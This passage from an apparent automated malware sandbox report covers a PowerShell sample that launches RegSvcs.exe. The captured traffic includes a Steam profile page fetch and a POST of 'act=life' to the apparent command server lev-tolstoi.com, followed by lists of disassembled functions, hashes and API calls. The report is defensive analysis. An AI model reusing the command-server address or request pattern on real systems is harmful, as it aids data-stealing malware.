09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-02 08:00:09 UTC	16384	IN	Data Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09 Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2025-01-02 08:00:09 UTC	3768	IN	Data Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 22 Data Ascii: </div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_name"
2025-01-02 08:00:09 UTC	490	IN	Data Raw: 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 74 Data Ascii: r Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div class="bt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49714	172.67.157.254	443	3392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 08:00:09 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: lev-tolstoi.com
2025-01-02 08:00:09 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life

Target ID:	0
Start time:	03:00:04
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:00:04
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:00:06
Start date:	02/01/2025
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\ipconfig.exe" /flushdns
Imagebase:	0x7ff6bf8a0000
File size:	35'840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:00:07
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xbb0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FFD348948F2 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

Yr, xrefs: 00007FFD3489DE0B

Memory Dump Source

Source File: 00000000.00000002.2214532633.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID: Yr
API String ID: 0-48185740
Opcode ID: a55a2d577b6c71d85fd377edd145cd9e5e785c469c270c957feb740dfb9ceaf4
Instruction ID: 56a63275d9599f621f5a786c01422db1db6269197c0e5199d27efb3c6c54f09e
Opcode Fuzzy Hash: a55a2d577b6c71d85fd377edd145cd9e5e785c469c270c957feb740dfb9ceaf4
Instruction Fuzzy Hash: DE11E432F0CE135BE7716BB898F44E93BC1AF42328B194136D649CB2C2DC6D6805A299

Function 00007FFD3496149A Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2215038600.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3553df36754f14bb477414ee98f2a84a4911c1f0e66392c122058b00494c995e
Instruction ID: d827d8bc9613a534c8d6349cdcc4f5bbe0d30693f8a794b233f90bd3eff65e3e
Opcode Fuzzy Hash: 3553df36754f14bb477414ee98f2a84a4911c1f0e66392c122058b00494c995e
Instruction Fuzzy Hash: 90212E32B0C9190FFBA4966C64675F4B3D2EF95370B1801BBD54EC3196DD1DAC155390

Function 00007FFD3489DD7C Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2214532633.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c27f7c4184add19b0171883a0e76f306448351665189dad2c9efecaad36adce9
Instruction ID: 96bf834d5ba20ba8e519cc9f02a40844ad51a4ddaab4844c8a5695d3c9255f26
Opcode Fuzzy Hash: c27f7c4184add19b0171883a0e76f306448351665189dad2c9efecaad36adce9
Instruction Fuzzy Hash: FB01A292B09D460FE35AA72804B52BA5AC2DFAA248B4401BEC54EC73D3DC1C684153D4

Function 00007FFD348937B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2214532633.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: bf533fd274c58afd781b72c11c81cc6882029034b975418c297449fcca739756
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 5D01677121CB0D4FD744EF4CE451AA6B7E0FB99364F10056DE58AC3651D736E882CB45

Function 00007FFD349614C1 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2215038600.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13afe774dfdad68bdc1a15cacbe22741df590d27210a85658c9d87c813a4e7a7
Instruction ID: e730f9fd3fe8cf1c57286e0291a880b1ea76b5e75f754e4cd397272465981f63
Opcode Fuzzy Hash: 13afe774dfdad68bdc1a15cacbe22741df590d27210a85658c9d87c813a4e7a7
Instruction Fuzzy Hash: CDF08223F0D9590EF7A195AC34A71F496C2EFA667174802BBD98EC325ADC1C6C155390

Function 00007FFD348989CE Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2214532633.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7faea9fefb52cfa75fd5994ddaa3f483de9e18e1e582f790d0192c7421e3833
Instruction ID: 4167b50cddb53792cfa66400aa022b7efea1121d7bb87cfde21bc656980c459c
Opcode Fuzzy Hash: b7faea9fefb52cfa75fd5994ddaa3f483de9e18e1e582f790d0192c7421e3833
Instruction Fuzzy Hash: A1F0E931748A064BDB0CEE3C84A70397656E786300760523DE997C73E2FC18E92782C1

Function 00007FFD348959AB Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2214532633.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78bc2c59da701eab858cbc2a371030dc35106c99979c78dfa79729f42769e0d3
Instruction ID: ca437121906d0e9fa7627295d8c5cf788ec2163b8eba09dc6d63dad9c13488bd
Opcode Fuzzy Hash: 78bc2c59da701eab858cbc2a371030dc35106c99979c78dfa79729f42769e0d3
Instruction Fuzzy Hash: 04F03070B2D7404FC748DB6880A242A7BD5FF99B05F40253DF5CAD3282CA38A9028B47

Function 00007FFD34894CD7 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2214532633.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f4ea97f344dc7b3226ab5761fa06929654e80a8e3d4b883a01cc943edb02b34
Instruction ID: 6b08a76dc20b515b977a556bb60bb7f494a991803f14106454b1c8c733a02706
Opcode Fuzzy Hash: 4f4ea97f344dc7b3226ab5761fa06929654e80a8e3d4b883a01cc943edb02b34
Instruction Fuzzy Hash: ACF06D70E0850BCFDB04DFA8C4819BEBBF2BB85314F108529D115E2285CA38AA40DB98

Non-executed Functions

Function 00007FFD34893D05 Relevance: 1.6, Strings: 1, Instructions: 360COMMON

Download Yara Rule

Strings

4, xrefs: 00007FFD34893D38

Memory Dump Source

Source File: 00000000.00000002.2214532633.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 9721cb4d7c935f060526d9c1bdd5fd22a5a5e475c54f1794bedf369462a06877
Instruction ID: 000971aee401410d5ddc49d6bfe4df411059ab9bd6c24ba3570988b8077953f8
Opcode Fuzzy Hash: 9721cb4d7c935f060526d9c1bdd5fd22a5a5e475c54f1794bedf369462a06877
Instruction Fuzzy Hash: 14A18257E0EAC61FF663972C98B60D93F94EF9726570910B7C684CE4939D1C680BA222

Function 00007FFD34895FA0 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FFD3489745D

Memory Dump Source

Source File: 00000000.00000002.2214532633.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: dd4f3e7554d1c35ec583bac434c1015f7f9f9dc7aff587244607bbdbfe81e427
Instruction ID: e61f9dfe9ddb57a97b762f89af5736a160ad731946e8eec5dc43412ed7dc54af
Opcode Fuzzy Hash: dd4f3e7554d1c35ec583bac434c1015f7f9f9dc7aff587244607bbdbfe81e427
Instruction Fuzzy Hash: CB512732A0D6554FD31E9A3D98564B17BA5EB8722071582BED5C7CB1A3E828AC07C291

Function 00007FFD34893B4D Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2214532633.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7fdf690e20feb70d61a8a2dd8efd70e371feea767c4d8ba946609ccb39df532
Instruction ID: a6dfb260c83e255bfefb2a6657fcee97c4b5b876d55a10f6c326d5dd7af5b3c1
Opcode Fuzzy Hash: a7fdf690e20feb70d61a8a2dd8efd70e371feea767c4d8ba946609ccb39df532
Instruction Fuzzy Hash: 43713D67A0DAC25FE312973D98B60D53FA0EF9722970900F7C2D4CE093DA1D685AA761

Function 00007FFD34893FC5 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2214532633.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a113084ddb1f621a5c8f33e6714729edc0121179ec609d06339660d720179f5e
Instruction ID: 8b27c0e8c2932c859344f846e2ffd1f14b3d88acd07f9f58343218780afefb93
Opcode Fuzzy Hash: a113084ddb1f621a5c8f33e6714729edc0121179ec609d06339660d720179f5e
Instruction Fuzzy Hash: F4513B57A0EBC26FE752973858B60D97FA0EE5366570911F7CAC5CF093DA0C281BA312

Function 00007FFD348941FA Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2214532633.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d603c94168476d6de67d98686ec69ce7506244775546f1be5629ab90cefa26f
Instruction ID: ff4ae56f3ff643ec73ad194243a13801186c0a4b1c2bb315d679e845f2f43401
Opcode Fuzzy Hash: 7d603c94168476d6de67d98686ec69ce7506244775546f1be5629ab90cefa26f
Instruction Fuzzy Hash: 7E51631AB0DBC25FE756577C58B64D93FA0EF93729B0900F7C6C4CA093A91D180AA361

Function 00007FFD348940FA Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2214532633.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1233bffec21f73b257eba7427e5a7d16d48f7e472b5b8dba3146907a3d0c3e89
Instruction ID: 4b14d8d20ff626949ef0065f500c338c92c2aae452a02db1a8c96e23585f9d8d
Opcode Fuzzy Hash: 1233bffec21f73b257eba7427e5a7d16d48f7e472b5b8dba3146907a3d0c3e89
Instruction Fuzzy Hash: 3741535AA0DBD25FE752D72C58F60D53FE4DF6322570910F7CA95CE093DE1C280AA262

Function 00007FFD3489DB92 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2214532633.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9eef47be83bf4bd041a9f2d15cf0763e392b41c5da148981b5fd0e19aca1ea7
Instruction ID: 7dcd719c62c965cc90c22a0ae9f94904481d757670c6dc5adab2cbec6247d463
Opcode Fuzzy Hash: a9eef47be83bf4bd041a9f2d15cf0763e392b41c5da148981b5fd0e19aca1ea7
Instruction Fuzzy Hash: E5317672A0C7841FE319AF6C4C660F67BD4DB8333470552BBD2C9CB0A3EE2898078241

Function 00007FFD34895590 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2214532633.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0799962af91bf47d2d25cc2f92d52c5bf9f16ac57bb5de8e1162ace9c9004420
Instruction ID: 18a4967595ca188321a53fc64caac49bf2a83bf788973684020e8eadb1854c5a
Opcode Fuzzy Hash: 0799962af91bf47d2d25cc2f92d52c5bf9f16ac57bb5de8e1162ace9c9004420
Instruction Fuzzy Hash: 77216A62B0DA890FD36D9EB84CEA472BF99D79725430A827EC6C7C71A3DD18640743C1

Function 00007FFD3489AA10 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2214532633.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 109fa72fddba57ca85e61b5aee705c6448ceb0b1c1a24993f568a0c2fd142459
Instruction ID: f5c6f840135cb2ce4f890c496cc4bf2dcfd40694daa70714ec8feff243dfdfe9
Opcode Fuzzy Hash: 109fa72fddba57ca85e61b5aee705c6448ceb0b1c1a24993f568a0c2fd142459
Instruction Fuzzy Hash: 5711296278D3980FA32C5C745CDB472BB9DC383124306927FDAD3C65A3DD49A41352C1

Function 00007FFD34897DC8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2214532633.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1946e18671bd6612feec771c74792ec017ff9c8bb2d843e4dff71312a0f55612
Instruction ID: 32f58c7154f717000fb8343e26ce57284d263057bb7c554be9c0865766d88399
Opcode Fuzzy Hash: 1946e18671bd6612feec771c74792ec017ff9c8bb2d843e4dff71312a0f55612
Instruction Fuzzy Hash: 08112932B1CA581F972CDE38886517B7BDAE3C7210B11833EE687C32D6DE24980356C1

Analysis Process: RegSvcs.exePID: 3392, Parent PID: 4824COMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.4%
Total number of Nodes:	63
Total number of Limit Nodes:	3

Executed Functions

Function 00408600 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 351
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408624
GetCurrentThreadId.KERNEL32 ref: 0040862E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004087FA
GetForegroundWindow.USER32 ref: 00408974

Part of subcall function 0040B7B0: FreeLibrary.KERNEL32(00408A31), ref: 0040B7B6
Part of subcall function 0040B7B0: FreeLibrary.KERNEL32 ref: 0040B7D7

ExitProcess.KERNEL32 ref: 00408A4A

Strings

}, xrefs: 0040890C
}, xrefs: 00408913
b]u), xrefs: 00408877

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: b]u)$}$}
API String ID: 3676751680-2900034282
Opcode ID: 6a07f0384f71d87041b62ad58867324155b1be50ba3e74cb306905e4ea8226d7
Instruction ID: 3bf81113ce60e3950654fa87f9b5bc85db09618474996d7b9c4e13ef7b0d228f
Opcode Fuzzy Hash: 6a07f0384f71d87041b62ad58867324155b1be50ba3e74cb306905e4ea8226d7
Instruction Fuzzy Hash: C4C1E673E187144BC708DF69C84125AF7D6ABC8710F0AC53EA898EB391EA74DD048BC6

Function 0043E110 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0044148A,?,00000018,?,?,00000018,?,?,?), ref: 0043E13E

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 00408A50 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
Instruction ID: c6ef65a4040eb9722264cce64ace65176086622d4161082164e2e1e487573ca7
Opcode Fuzzy Hash: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
Instruction Fuzzy Hash: E121C837A62B184BD3108E54DCC87917761E7D9318F3E86B8C9249F7D2C97BA91386C0

Function 00409D1E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000000), ref: 00409D98
LoadLibraryExW.KERNEL32(?,00000000), ref: 00409E78

Strings

CKI, xrefs: 00409E85

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: LibraryLoad
String ID: CKI
API String ID: 1029625771-2433779057
Opcode ID: 46ebf1f11a428727df2c69ed2ddcf1f0c4f78635cb5cf24ba122c25d2125fb43
Instruction ID: 9df50abc4230604fad3af689b86cbcfc4f62151ff32a39ed9a717dc759385280
Opcode Fuzzy Hash: 46ebf1f11a428727df2c69ed2ddcf1f0c4f78635cb5cf24ba122c25d2125fb43
Instruction Fuzzy Hash: 1041EFB4D003009FEB149F789992A9A7F71EB06324F5152ADD4902F3E6C635981A8BE6

Function 0043E34B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043E3BA

Strings

, xrefs: 0043E365, 0043E37C

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-3019521637
Opcode ID: 1a0742d174ed02cdc22a72f35ed7972a2a7288d22f9a72e178f62dae787fe3a6
Instruction ID: 528e16a96f9d9f00b26d3e5e14e5fe829b229e0aa49aafaba4eb36a7b6cd6e75
Opcode Fuzzy Hash: 1a0742d174ed02cdc22a72f35ed7972a2a7288d22f9a72e178f62dae787fe3a6
Instruction Fuzzy Hash: FA112B7AE418614BEF08CF39DC171AA77A2B3C5325B2D56B98816E32D0DA3C5C068A84

Function 00437764 Relevance: 1.6, APIs: 1, Instructions: 90
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0043779D

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: bc18d378b5dd9222f1d4b2f2bf41a228d576f499a8aff68b17f4869370526a21
Instruction ID: 54b6fee0e0571655c33f26142f93ff03fb1190c0e218daea6acb4e94425ab4d3
Opcode Fuzzy Hash: bc18d378b5dd9222f1d4b2f2bf41a228d576f499a8aff68b17f4869370526a21
Instruction Fuzzy Hash: 0C31E472A466418FD7158B78C8837ADBBE28BD5314F0A80AEE459C73A2D9388942CB10

Function 0043E0A0 Relevance: 1.5, APIs: 1, Instructions: 31
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000), ref: 0043E0E0

Memory Dump Source

Source File: 00000004.00000002.2498669551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b084c91fa9192e24328343e825f84096d97414ba82a0ea4300841eb5d6395bab
Instruction ID: ded93e649b1cf2343eaa9575ea92e3a5feecd1f56bb2e5dbe1310a0afb74cdc2
Opcode Fuzzy Hash: b084c91fa9192e24328343e825f84096d97414ba82a0ea4300841eb5d6395bab
Instruction Fuzzy Hash: CDF0EC76824231FBC3102F397D05A573674EFCB720F05143AF40056161DB78DC17969A

Function 0043E3A9 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043E3BA

Memory Dump Source

